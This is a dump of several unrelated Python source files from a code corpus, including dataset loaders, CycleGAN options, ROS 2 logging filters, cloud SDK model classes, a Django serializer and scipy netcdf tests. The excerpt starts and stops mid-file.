tgt\n\n\ndef yield_sources_and_targets(\n input_file_pattern,\n input_format,\n source_key = None,\n target_key = None):\n \"\"\"Produces an iterator over pairs (source list, targets) parsed from a file.\n\n Args:\n input_file_pattern: Path/pattern to the input file(s).\n input_format: Format of the input file.\n source_key: Source text feature name. Only considered when\n `input_format=sstable`.\n target_key: Target text feature name. Only considered when\n `input_format=sstable`.\n\n Yields:\n Pairs of (list of source texts, target text).\n \"\"\"\n data_spec = {\n \"wikisplit\": (text_file_iterator, get_parse_tsv_line_fn()),\n \"discofuse\": (skip_header_text_file_iterator, parse_discofuse_line),\n \"IteraTE_Plain\": (skip_header_text_file_iterator, parse_iterate_plain_line),\n \"IteraTE_Intent\": (skip_header_text_file_iterator, parse_iterate_intent_line),\n }\n\n if input_format not in data_spec:\n raise ValueError(\"Unsupported input_format: {}\".format(input_format))\n\n file_iterator_fn, parse_fn = data_spec[input_format]\n for item in file_iterator_fn(input_file_pattern):\n # Pytype correctly infers possible types for `item`, but does not handle\n # well the various possible signatures of `parse_fn`.\n parsed_item = parse_fn(item) # pytype: disable=wrong-arg-types\n if parsed_item is not None:\n yield parsed_item\n\n\ndef get_filenames(patterns):\n \"\"\"Obtains a list of filenames corresponding to the pattern.\n\n Supports patterns, as well as plain\n file names, as well as comma-separated lists of patterns.\n\n Caveat: Will not work if the patterns have commas (',') in them.\n\n Args:\n patterns: File pattern or comma-separated patterns.\n\n Raises:\n RuntimeError: If `patterns` is valid but cannot be expanded/does not match\n any files.\n\n Returns:\n list of individual paths to each file.\n \"\"\"\n all_files = []\n for pattern in patterns.split(\",\"):\n # points to a specific file.\n files = tf.io.gfile.glob(pattern)\n if not files:\n raise RuntimeError(\"Could not find files matching: %s\" % pattern)\n all_files.extend(files)\n\n return all_files\n\n\ndef read_label_map(\n path,\n use_str_keys = False):\n \"\"\"Returns label map read from the given path.\n\n Args:\n path: Path to the label map file.\n use_str_keys: Whether to use label strings as keys instead of\n (base tag, num insertions) tuple keys. The latter is only used by\n FelixInsert.\n \"\"\"\n label_map = {}\n with tf.io.gfile.GFile(path) as f:\n if path.endswith(\".json\"):\n label_map = json.load(f)\n else:\n for tag in f:\n tag = tag.strip()\n # Empty lines are skipped.\n if tag:\n if tag in label_map:\n raise ValueError(\"Duplicate label in label_map: {}\".format(tag))\n label_map[tag] = len(label_map)\n if not use_str_keys:\n new_label_map = {}\n for key, val in label_map.items():\n if \"|\" in key:\n pos_pipe = key.index(\"|\")\n new_key = (key[:pos_pipe], int(key[pos_pipe + 1:]))\n else:\n new_key = (key, 0)\n new_label_map[new_key] = val\n label_map = new_label_map\n return label_map\n"} {"ext": "py", "sha": "1a304f7ea1d05edd53437f4b33cf05368d9e2c67", "content": "import argparse\nimport os\nfrom util import util\nimport torch\nimport models\nimport data\n\n\nclass BaseOptions():\n \"\"\"This class defines options used during both training and test time.\n\n It also implements several helper functions such as parsing, printing, and saving the options.\n It also gathers additional options defined in functions in both dataset class and model class.\n \"\"\"\n\n def __init__(self):\n \"\"\"Reset the class; indicates the class hasn't been initailized\"\"\"\n self.initialized = False\n\n def initialize(self, parser):\n \"\"\"Define the common options that are used in both training and test.\"\"\"\n # basic parameters\n parser.add_argument('--dataroot', required=True, help='path to images (should have subfolders trainA, trainB, valA, valB, etc)')\n parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment. It decides where to store samples and models')\n parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\n parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')\n # model parameters\n parser.add_argument('--model', type=str, default='cycle_gan', help='chooses which model to use. [cycle_gan | pix2pix | test | colorization]')\n parser.add_argument('--input_nc', type=int, default=3, help='# of input image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--output_nc', type=int, default=3, help='# of output image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')\n parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')\n parser.add_argument('--netD', type=str, default='basic', help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. n_layers allows you to specify the layers in the discriminator')\n parser.add_argument('--netG', type=str, default='resnet_9blocks', help='specify generator architecture [resnet_9blocks | resnet_6blocks | unet_256 | unet_128]')\n parser.add_argument('--n_layers_D', type=int, default=3, help='only used if netD==n_layers')\n parser.add_argument('--norm', type=str, default='instance', help='instance normalization or batch normalization [instance | batch | none]')\n parser.add_argument('--init_type', type=str, default='normal', help='network initialization [normal | xavier | kaiming | orthogonal]')\n parser.add_argument('--init_gain', type=float, default=0.02, help='scaling factor for normal, xavier and orthogonal.')\n parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')\n parser.add_argument('--conv_type', type=str, default='conv2d', help='conv type [conv2d | dcn_v1 | dcn_v2 | mixed]')\n # dataset parameters\n parser.add_argument('--dataset_mode', type=str, default='unaligned', help='chooses how datasets are loaded. [unaligned | aligned | single | colorization]')\n parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')\n parser.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')\n parser.add_argument('--num_threads', default=4, type=int, help='# threads for loading data')\n parser.add_argument('--batch_size', type=int, default=1, help='input batch size')\n parser.add_argument('--load_size', type=int, default=286, help='scale images to this size')\n parser.add_argument('--crop_size', type=int, default=256, help='then crop to this size')\n parser.add_argument('--max_dataset_size', type=int, default=float(\"inf\"), help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')\n parser.add_argument('--preprocess', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')\n parser.add_argument('--no_flip', action='store_true', help='if specified, do not flip the images for data augmentation')\n parser.add_argument('--display_winsize', type=int, default=256, help='display window size for both visdom and HTML')\n # additional parameters\n parser.add_argument('--epoch', type=str, default='latest', help='which epoch to load? set to latest to use latest cached model')\n parser.add_argument('--load_iter', type=int, default='0', help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')\n parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')\n parser.add_argument('--suffix', default='', type=str, help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')\n self.initialized = True\n return parser\n\n def gather_options(self):\n \"\"\"Initialize our parser with basic options(only once).\n Add additional model-specific and dataset-specific options.\n These options are defined in the function\n in model and dataset classes.\n \"\"\"\n if not self.initialized: # check if it has been initialized\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser = self.initialize(parser)\n\n # get the basic options\n opt, _ = parser.parse_known_args()\n\n # modify model-related parser options\n model_name = opt.model\n model_option_setter = models.get_option_setter(model_name)\n parser = model_option_setter(parser, self.isTrain)\n opt, _ = parser.parse_known_args() # parse again with new defaults\n\n # modify dataset-related parser options\n dataset_name = opt.dataset_mode\n dataset_option_setter = data.get_option_setter(dataset_name)\n parser = dataset_option_setter(parser, self.isTrain)\n\n # save and return the parser\n self.parser = parser\n return parser.parse_args()\n\n def print_options(self, opt):\n \"\"\"Print and save options\n\n It will print both current options and default values(if different).\n It will save options into a text file / [checkpoints_dir] / opt.txt\n \"\"\"\n message = ''\n message += '----------------- Options ---------------\\n'\n for k, v in sorted(vars(opt).items()):\n comment = ''\n default = self.parser.get_default(k)\n if v != default:\n comment = '\\t[default: %s]' % str(default)\n message += '{:>25}: {:<30}{}\\n'.format(str(k), str(v), comment)\n message += '----------------- End -------------------'\n print(message)\n\n # save to the disk\n expr_dir = os.path.join(opt.checkpoints_dir, opt.name)\n util.mkdirs(expr_dir)\n file_name = os.path.join(expr_dir, '{}_opt.txt'.format(opt.phase))\n with open(file_name, 'wt') as opt_file:\n opt_file.write(message)\n opt_file.write('\\n')\n\n def parse(self):\n \"\"\"Parse our options, create checkpoints directory suffix, and set up gpu device.\"\"\"\n opt = self.gather_options()\n opt.isTrain = self.isTrain # train or test\n\n # process opt.suffix\n if opt.suffix:\n suffix = ('_' + opt.suffix.format(**vars(opt))) if opt.suffix != '' else ''\n opt.name = opt.name + suffix\n\n self.print_options(opt)\n\n # set gpu ids\n str_ids = opt.gpu_ids.split(',')\n opt.gpu_ids = []\n for str_id in str_ids:\n id = int(str_id)\n if id >= 0:\n opt.gpu_ids.append(id)\n if len(opt.gpu_ids) > 0:\n torch.cuda.set_device(opt.gpu_ids[0])\n\n self.opt = opt\n return self.opt\n"} {"ext": "py", "sha": "1a304fb8b4003bdc8146cbb2fd665e2bee8eff90", "content": "# Copyright 2017 Open Source Robotics Foundation, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom collections import namedtuple\nfrom collections import OrderedDict\nimport inspect\nimport os\n\nfrom rclpy.clock import Clock\nfrom rclpy.impl.implementation_singleton import rclpy_implementation as _rclpy\n\n# Known filenames from which logging methods can be called (will be ignored in `_find_caller`).\n_internal_callers = []\n# This will cause rclpy filenames to be registered in `_internal_callers` on first logging call.\n_populate_internal_callers = True\n\n\ndef _find_caller(frame):\n \"\"\"Get the first calling frame that is outside of rclpy.\"\"\"\n global _populate_internal_callers\n global _internal_callers\n if _populate_internal_callers:\n # Populate the list of internal filenames from which logging methods can be called.\n # This has to be done from within a function to avoid cyclic module imports.\n import rclpy.logging\n # Extend the list to preserve any filenames that may have been added by third parties.\n # Note: the call to `realpath` will also resolve mixed slashes that can result on Windows.\n _internal_callers.extend([\n os.path.realpath(__file__),\n os.path.realpath(rclpy.logging.__file__),\n ])\n _populate_internal_callers = False\n\n file_path = os.path.realpath(inspect.getframeinfo(frame).filename)\n while any(f in file_path for f in _internal_callers):\n frame = frame.f_back\n file_path = os.path.realpath(inspect.getframeinfo(frame).filename)\n return frame\n\n\nclass CallerId(\n namedtuple('CallerId', ['function_name', 'file_path', 'line_number', 'last_index'])):\n\n def __new__(cls, frame=None):\n if not frame:\n frame = _find_caller(inspect.currentframe())\n return super(CallerId, cls).__new__(\n cls,\n function_name=frame.f_code.co_name,\n file_path=os.path.abspath(inspect.getframeinfo(frame).filename),\n line_number=frame.f_lineno,\n last_index=frame.f_lasti, # To distinguish between two callers on the same line\n )\n\n\nclass LoggingFilter:\n \"\"\"Base class for logging filters.\"\"\"\n\n \"\"\"\n Parameters of a filter and their default value, if appropriate.\n\n A default value of None makes a parameter required.\n \"\"\"\n params = {}\n\n \"\"\"\n Initialize the context of a logging call, e.g. declare variables needed for\n determining the log condition and add them to the context.\n \"\"\"\n @classmethod\n def initialize_context(cls, context, **kwargs):\n # Store all parameters in the context so we can check that users never try to change them.\n for param in cls.params:\n context[param] = kwargs.get(param, cls.params[param])\n if context[param] is None:\n raise TypeError(\n 'Required parameter \"{0}\" was not specified for logging filter \"{1}\"'\n .format(param, cls.__name__))\n\n \"\"\"\n Decide if it's appropriate to log given a context, and update the context accordingly.\n \"\"\"\n @staticmethod\n def should_log(context):\n return True\n\n\nclass Once(LoggingFilter):\n \"\"\"Ignore all log calls except the first one.\"\"\"\n\n params = {\n 'once': None,\n }\n\n @classmethod\n def initialize_context(cls, context, **kwargs):\n super(Once, cls).initialize_context(context, **kwargs)\n context['has_been_logged_once'] = False\n\n @staticmethod\n def should_log(context):\n logging_condition = False\n if not context['has_been_logged_once']:\n logging_condition = True\n context['has_been_logged_once'] = True\n return logging_condition\n\n\nclass Throttle(LoggingFilter):\n \"\"\"Ignore log calls if the last call is not longer ago than the specified duration.\"\"\"\n\n params = {\n 'throttle_duration_sec': None,\n 'throttle_time_source_type': Clock(),\n }\n\n @classmethod\n def initialize_context(cls, context, **kwargs):\n super(Throttle, cls).initialize_context(context, **kwargs)\n context['throttle_last_logged'] = 0\n if not isinstance(context['throttle_time_source_type'], Clock):\n raise ValueError(\n 'Received throttle_time_source_type of \"{0}\" '\n 'is not a clock instance'\n .format(context['throttle_time_source_type']))\n\n @staticmethod\n def should_log(context):\n logging_condition = True\n now = context['throttle_time_source_type'].now().nanoseconds\n next_log_time = context['throttle_last_logged'] + (context['throttle_duration_sec'] * 1e+9)\n logging_condition = now >= next_log_time\n if logging_condition:\n context['throttle_last_logged'] = now\n return logging_condition\n\n\nclass SkipFirst(LoggingFilter):\n \"\"\"Ignore the first log call but process all subsequent calls.\"\"\"\n\n params = {\n 'skip_first': None,\n }\n\n @classmethod\n def initialize_context(cls, context, **kwargs):\n super(SkipFirst, cls).initialize_context(context, **kwargs)\n context['first_has_been_skipped'] = False\n\n @staticmethod\n def should_log(context):\n logging_condition = True\n if not context['first_has_been_skipped']:\n logging_condition = False\n context['first_has_been_skipped'] = True\n return logging_condition\n\n\n# The ordering of this dictionary defines the order in which filters will be processed.\nsupported_filters = OrderedDict()\nsupported_filters['throttle'] = Throttle\nsupported_filters['skip_first'] = SkipFirst\nsupported_filters['once'] = Once\n\n\ndef get_filters_from_kwargs(**kwargs):\n \"\"\"\n Determine which filters have had parameters specified in the given keyword arguments.\n\n Returns the list of filters using the order specified by `supported_filters`.\n \"\"\"\n detected_filters = []\n all_supported_params = []\n for supported_filter, filter_class in supported_filters.items():\n filter_params = filter_class.params.keys()\n all_supported_params.extend(filter_params)\n if any(kwargs.get(param_name) for param_name in filter_params):\n detected_filters.append(supported_filter)\n # Check that all required parameters (with no default value) have been specified\n for detected_filter in detected_filters:\n for param_name, default_value in supported_filters[detected_filter].params.items():\n if param_name in kwargs:\n continue\n\n # Param not specified; use the default.\n if default_value is None:\n raise TypeError(\n 'required parameter \"{0}\" not specified '\n 'but is required for the the logging filter \"{1}\"'.format(\n param_name, detected_filter))\n kwargs[param_name] = default_value\n for kwarg in kwargs:\n if kwarg not in all_supported_params:\n raise TypeError(\n 'parameter \"{0}\" is not one of the recognized logging options \"{1}\"'\n .format(kwarg, all_supported_params)\n )\n return detected_filters\n\n\nclass RcutilsLogger:\n\n def __init__(self, name=''):\n self.name = name\n self.contexts = {}\n\n def get_child(self, name):\n if not name:\n raise ValueError('Child logger name must not be empty.')\n if self.name:\n # Prepend the name of this logger\n name = self.name + '.' + name\n return RcutilsLogger(name=name)\n\n def set_level(self, level):\n from rclpy.logging import LoggingSeverity\n level = LoggingSeverity(level)\n return _rclpy.rclpy_logging_set_logger_level(self.name, level)\n\n def get_effective_level(self):\n from rclpy.logging import LoggingSeverity\n level = LoggingSeverity(\n _rclpy.rclpy_logging_get_logger_effective_level(self.name))\n return level\n\n def is_enabled_for(self, severity):\n from rclpy.logging import LoggingSeverity\n severity = LoggingSeverity(severity)\n return _rclpy.rclpy_logging_logger_is_enabled_for(self.name, severity)\n\n def log(self, message, severity, **kwargs):\n r\"\"\"\n Log a message with the specified severity.\n\n The message will not be logged if:\n * the logger is not enabled for the message's severity (the message severity is less than\n the level of the logger), or\n * a logging filter causes the message to be skipped.\n\n .. note::\n Logging filters will only be evaluated if the logger is enabled for the message's\n severity.\n\n :param message str: message to log.\n :param severity: severity of the message.\n :type severity: :py:class:LoggingSeverity\n :keyword name str: name of the logger to use.\n :param \\**kwargs: optional parameters for logging filters (see below).\n\n :Keyword Arguments:\n * *throttle_duration_sec* (``float``) --\n Duration of the throttle interval for the :py:class:Throttle: filter.\n * *throttle_time_source_type* (``str``) --\n Optional time source type for the :py:class:Throttle: filter (default of\n ``RCUTILS_STEADY_TIME``)\n * *skip_first* (``bool``) --\n If True, enable the :py:class:SkipFirst: filter.\n * *once* (``bool``) --\n If True, enable the :py:class:Once: filter.\n :returns: False if a filter caused the message to not be logged; True otherwise.\n :raises: TypeError on invalid filter parameter combinations.\n :raises: ValueError on invalid parameters values.\n :rtype: bool\n \"\"\"\n # Gather context info and check filters only if the severity is appropriate.\n if not self.is_enabled_for(severity):\n return False\n\n from rclpy.logging import LoggingSeverity\n severity = LoggingSeverity(severity)\n\n name = kwargs.pop('name', self.name)\n\n # Infer the requested log filters from the keyword arguments\n detected_filters = get_filters_from_kwargs(**kwargs)\n\n # Get/prepare the context corresponding to the caller.\n caller_id = CallerId()\n if caller_id not in self.contexts:\n context = {'name': name, 'severity': severity}\n for detected_filter in detected_filters:\n if detected_filter in supported_filters:\n supported_filters[detected_filter].initialize_context(context, **kwargs)\n context['filters'] = detected_filters\n self.contexts[caller_id] = context\n else:\n context = self.contexts[caller_id]\n # Don't support any changes to the logger.\n if severity != context['severity']:\n raise ValueError('Logger severity cannot be changed between calls.')\n if name != context['name']:\n raise ValueError('Logger name cannot be changed between calls.')\n if detected_filters != context['filters']:\n raise ValueError('Requested logging filters cannot be changed between calls.')\n for detected_filter in detected_filters:\n filter_params = supported_filters[detected_filter].params\n if any(context[p] != kwargs.get(p, filter_params[p]) for p in filter_params):\n raise ValueError(\n 'Logging filter parameters cannot be changed between calls.')\n\n # Check if any filter determines the message shouldn't be processed.\n # Note(dhood): even if a message doesn't get logged, a filter might still update its state\n # as if it had been. This matches the behavior of the C logging macros provided by rcutils.\n for logging_filter in context['filters']:\n if not supported_filters[logging_filter].should_log(context):\n return False\n\n # Call the relevant function from the C extension.\n _rclpy.rclpy_logging_rcutils_log(\n severity, name, message,\n caller_id.function_name, caller_id.file_path, caller_id.line_number)\n return True\n\n def debug(self, message, **kwargs):\n \"\"\"Log a message with `DEBUG` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.DEBUG, **kwargs)\n\n def info(self, message, **kwargs):\n \"\"\"Log a message with `INFO` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.INFO, **kwargs)\n\n def warning(self, message, **kwargs):\n \"\"\"Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.WARN, **kwargs)\n\n def warn(self, message, **kwargs):\n \"\"\"\n Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:.\n\n Deprecated in favor of :py:classmethod:RcutilsLogger.warning:.\n \"\"\"\n return self.warning(message, **kwargs)\n\n def error(self, message, **kwargs):\n \"\"\"Log a message with `ERROR` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.ERROR, **kwargs)\n\n def fatal(self, message, **kwargs):\n \"\"\"Log a message with `FATAL` severity via :py:classmethod:RcutilsLogger.log:.\"\"\"\n from rclpy.logging import LoggingSeverity\n return self.log(message, LoggingSeverity.FATAL, **kwargs)\n"} {"ext": "py", "sha": "1a30507e3719dd13640618cadf10306d4426c321", "content": "def escreva(txt):\n vzs = int(len(txt)) + 2\n print('~' * vzs)\n print(f' {txt} ')\n print('~' * vzs)\n\n\nescreva('Ian Stigliano')\nescreva('Aprenda Python')\nescreva('Curso em Python do Guanabara')\nescreva('Ian')"} {"ext": "py", "sha": "1a30509d30a1bf83e042370ff613f420542870b5", "content": "# coding: utf-8\n\nimport pprint\nimport re\n\nimport six\n\n\n\n\n\nclass ImageDetectionResultDetailPolitics:\n\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n\n sensitive_list = []\n\n openapi_types = {\n 'confidence': 'float',\n 'label': 'str',\n 'face_detail': 'ImageDetectionResultDetailFaceDetail'\n }\n\n attribute_map = {\n 'confidence': 'confidence',\n 'label': 'label',\n 'face_detail': 'face_detail'\n }\n\n def __init__(self, confidence=None, label=None, face_detail=None):\n \"\"\"ImageDetectionResultDetailPolitics - a model defined in huaweicloud sdk\"\"\"\n \n \n\n self._confidence = None\n self._label = None\n self._face_detail = None\n self.discriminator = None\n\n if confidence is not None:\n self.confidence = confidence\n if label is not None:\n self.label = label\n if face_detail is not None:\n self.face_detail = face_detail\n\n @property\n def confidence(self):\n \"\"\"Gets the confidence of this ImageDetectionResultDetailPolitics.\n\n\n :return: The confidence of this ImageDetectionResultDetailPolitics.\n :rtype: float\n \"\"\"\n return self._confidence\n\n @confidence.setter\n def confidence(self, confidence):\n \"\"\"Sets the confidence of this ImageDetectionResultDetailPolitics.\n\n\n :param confidence: The confidence of this ImageDetectionResultDetailPolitics.\n :type: float\n \"\"\"\n self._confidence = confidence\n\n @property\n def label(self):\n \"\"\"Gets the label of this ImageDetectionResultDetailPolitics.\n\n\n :return: The label of this ImageDetectionResultDetailPolitics.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this ImageDetectionResultDetailPolitics.\n\n\n :param label: The label of this ImageDetectionResultDetailPolitics.\n :type: str\n \"\"\"\n self._label = label\n\n @property\n def face_detail(self):\n \"\"\"Gets the face_detail of this ImageDetectionResultDetailPolitics.\n\n\n :return: The face_detail of this ImageDetectionResultDetailPolitics.\n :rtype: ImageDetectionResultDetailFaceDetail\n \"\"\"\n return self._face_detail\n\n @face_detail.setter\n def face_detail(self, face_detail):\n \"\"\"Sets the face_detail of this ImageDetectionResultDetailPolitics.\n\n\n :param face_detail: The face_detail of this ImageDetectionResultDetailPolitics.\n :type: ImageDetectionResultDetailFaceDetail\n \"\"\"\n self._face_detail = face_detail\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ImageDetectionResultDetailPolitics):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a305242a09f192c3cb9515271fa7ceb5357e232", "content": "# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack import *\n\n\nclass RTfmpvalue(RPackage):\n \"\"\"In putative Transcription Factor Binding Sites (TFBSs) identification\n from sequence/alignments, we are interested in the significance of\n certain match score. TFMPvalue provides the accurate calculation of\n P-value with score threshold for Position Weight Matrices, or the score\n with given P-value. This package is an interface to code originally\n made available by Helene Touzet and Jean-Stephane Varre, 2007,\n Algorithms Mol Biol:2, 15.\"\"\"\n\n homepage = \"https://github.com/ge11232002/TFMPvalue\"\n url = \"https://cran.rstudio.com/src/contrib/TFMPvalue_0.0.6.tar.gz\"\n list_url = \"https://cran.rstudio.com/src/contrib/Archive/TFMPvalue\"\n\n version('0.0.6', '69fdf4f9b9a0f408a5cee9ce34bea261')\n\n depends_on('r-rcpp@0.11.1:', type=('build', 'run'))\n"} {"ext": "py", "sha": "1a30537e7480b0064fca0d62c9bb729f31c21ef4", "content": "https://forms.gle/3jisA75mp56U2F4L6\nhttps://docs.google.com/spreadsheets/d/e/2PACX-1vTUSn1L4ChdUQeJSx2ufan1h9AhHzKEqPwBZwYmigstcfylLoxdn50Ndz_SF1cSwKFAD9Pw1rPEfo6t/pubhtml"} {"ext": "py", "sha": "1a3053a65b79a4453d2e85f91bf7be515d587ce4", "content": "\"\"\" Contact serializers. \"\"\"\n\n# Django REST Framework\nfrom ast import Num\nfrom statistics import mode\nfrom rest_framework import serializers\n\n\n# Models\nfrom coeadmin.record.models.person import Person\nfrom coeadmin.record.models.contact import Contact\n\n# Serializers\nfrom coeadmin.record.serializers.person import PersonModelSerializer\n\n\n# Utilities\nfrom datetime import datetime, timedelta\n\nclass ContactModelSerializer(serializers.ModelSerializer):\n \"\"\" Contact serializer. \"\"\"\n\n person = PersonModelSerializer(allow_null=True)\n\n class Meta:\n \"\"\" Meta class. \"\"\"\n\n model = Contact\n fields = (\n 'id',\n 'person',\n 'contact_date',\n 'contact_type',\n 'insolation_days',\n 'high_insulation_date',\n 'is_active',\n )\n read_only_fields = (\n 'id',\n 'person'\n )\n\n\nclass AddContactSerializer(serializers.ModelSerializer):\n \"\"\" Add contact serializer. \"\"\"\n class Meta:\n \"\"\" Meta class. \"\"\"\n model = Contact\n fields = (\n 'id',\n 'person',\n 'contact_date',\n 'contact_type',\n 'insolation_days',\n 'high_insulation_date',\n 'is_active',\n )\n\n\n def create(self, validate_data):\n \"\"\" Create the contact. \"\"\"\n\n positive = self.context['positive']\n person = validate_data['person']\n days = validate_data['insolation_days']\n contact_date= validate_data['contact_date'],\n\n contact = Contact.objects.create(\n positive=positive,\n person=person,\n contact_date= validate_data['contact_date'],\n contact_type= validate_data['contact_type'],\n insolation_days=days,\n high_insulation_date=contact_date[0] + timedelta(days=days),\n )\n\n return contact"} {"ext": "py", "sha": "1a3053bf5ebef03ef1571f606882f58543820372", "content": "# Copyright 2015 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"The command group for cloud dataproc operations.\"\"\"\n\nfrom googlecloudsdk.calliope import base\n\n\nclass Operations(base.Group):\n \"\"\"View and manage Google Cloud Dataproc operations.\"\"\"\n\n detailed_help = {\n 'DESCRIPTION': '{description}',\n 'EXAMPLES': \"\"\"\\\n To cancel an active operation, run:\n\n $ {command} cancel operation_id\n\n To view the details of an operation, run:\n\n $ {command} describe operation_id\n\n To see the list of all operations, run:\n\n $ {command} list\n\n To delete the record of an inactive operation, run:\n\n $ {command} delete operation_id\n \"\"\",\n }\n"} {"ext": "py", "sha": "1a3053e21bd3e36feaff15231bc4c71fec1fef21", "content": "''' Tests for netcdf '''\nfrom __future__ import division, print_function, absolute_import\n\nimport os\nfrom os.path import join as pjoin, dirname\nimport shutil\nimport tempfile\nimport warnings\nfrom io import BytesIO\nfrom glob import glob\nfrom contextlib import contextmanager\n\nimport numpy as np\nfrom numpy.testing import (assert_, assert_allclose, assert_raises,\n assert_equal, run_module_suite)\n\nfrom scipy.io.netcdf import netcdf_file\n\nfrom scipy._lib._tmpdirs import in_tempdir\n\nTEST_DATA_PATH = pjoin(dirname(__file__), 'data')\n\nN_EG_ELS = 11 # number of elements for example variable\nVARTYPE_EG = 'b' # var type for example variable\n\n\n@contextmanager\ndef make_simple(*args, **kwargs):\n f = netcdf_file(*args, **kwargs)\n f.history = 'Created for a test'\n f.createDimension('time', N_EG_ELS)\n time = f.createVariable('time', VARTYPE_EG, ('time',))\n time[:] = np.arange(N_EG_ELS)\n time.units = 'days since 2008-01-01'\n f.flush()\n yield f\n f.close()\n\n\ndef check_simple(ncfileobj):\n '''Example fileobj tests '''\n assert_equal(ncfileobj.history, b'Created for a test')\n time = ncfileobj.variables['time']\n assert_equal(time.units, b'days since 2008-01-01')\n assert_equal(time.shape, (N_EG_ELS,))\n assert_equal(time[-1], N_EG_ELS-1)\n\ndef assert_mask_matches(arr, expected_mask):\n '''\n Asserts that the mask of arr is effectively the same as expected_mask.\n\n In contrast to numpy.ma.testutils.assert_mask_equal, this function allows\n testing the 'mask' of a standard numpy array (the mask in this case is treated\n as all False).\n\n Parameters\n ----------\n arr: ndarray or MaskedArray\n Array to test.\n expected_mask: array_like of booleans\n A list giving the expected mask.\n '''\n\n mask = np.ma.getmaskarray(arr)\n assert_equal(mask, expected_mask)\n\n\ndef test_read_write_files():\n # test round trip for example file\n cwd = os.getcwd()\n try:\n tmpdir = tempfile.mkdtemp()\n os.chdir(tmpdir)\n with make_simple('simple.nc', 'w') as f:\n pass\n # read the file we just created in 'a' mode\n with netcdf_file('simple.nc', 'a') as f:\n check_simple(f)\n # add something\n f._attributes['appendRan'] = 1\n\n # To read the NetCDF file we just created::\n with netcdf_file('simple.nc') as f:\n # Using mmap is the default\n assert_(f.use_mmap)\n check_simple(f)\n assert_equal(f._attributes['appendRan'], 1)\n\n # Read it in append (and check mmap is off)\n with netcdf_file('simple.nc', 'a') as f:\n assert_(not f.use_mmap)\n check_simple(f)\n assert_equal(f._attributes['appendRan'], 1)\n\n # Now without mmap\n with netcdf_file('simple.nc', mmap=False) as f:\n # Using mmap is the default\n assert_(not f.use_mmap)\n check_simple(f)\n\n # To read the NetCDF file we just created, as file object, no\n # mmap. When n * n_bytes(var_type) is not divisible by 4, this\n # raised an error in pupynere 1.0.12 and scipy rev 5893, because\n # calculated vsize was rounding up in units of 4 - see\n # http://www.unidata.ucar.edu/software/netcdf/docs/netcdf.html\n with open('simple.nc', 'rb') as 